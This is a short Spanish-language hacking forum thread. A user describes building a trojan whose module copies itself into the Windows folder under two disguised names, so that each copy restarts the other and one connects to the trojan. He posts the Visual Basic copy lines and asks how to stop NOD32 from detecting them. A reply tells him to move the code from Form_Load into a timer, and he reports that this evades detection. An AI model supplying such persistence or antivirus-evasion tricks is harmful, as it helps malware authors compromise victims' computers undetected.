filecopy detectado por nod32 =S

hepy_92 · 18 Junio 2007, 22:22 PM

hace tiempo que estoy con un troyano, y decidi hacerle un modulo de "infeccion", entre comillas por que realmente no es infeccion.. lo unico que hace es copiar el programa 2 veces a la carpeta de windows, con los nombres ssms.exe y jushed.exe, el primero compureba cada cierto rato que exista el archivo jushed y que este iniciado el proceso, si no es asi, se autocopia, i si es necesario inicia el proceso, lo mismo jushed.exe, hace lo mismo, solo que inversamente, ademas de hacer la conexion al troyano. El problema esta en que en el modulo, esta la linea

Código [Seleccionar]

WinDirek = Environ("windir") & "/"
BSExe = App.path & "/" & App.EXEName & ".exe"
FileCopy BSExe, WinDirek & "jushed.exe"

si saco la linea filecopy, y le paso el nod32, no lo detecta, si la vuelvo a poner me lo empieza a detectar

alguien sabe como solucionarlo??? talve encriptandolo???
GraciasS de Antemano

~~ · 19 Junio 2007, 14:10 PM

Lo tienes puesto en el form_load?? si es asi cambialo a un timer y ya no te lo detecta

hepy_92 · 19 Junio 2007, 23:32 PM

!!!!!!!!
Gracias E0N!!!!!!!!!!!!!!!!!!!
siempre me salvas xD
gracias de nuevo!

Test Foro de elhacker.net SMF 2.1

filecopy detectado por nod32 =S

hepy_92

~~

hepy_92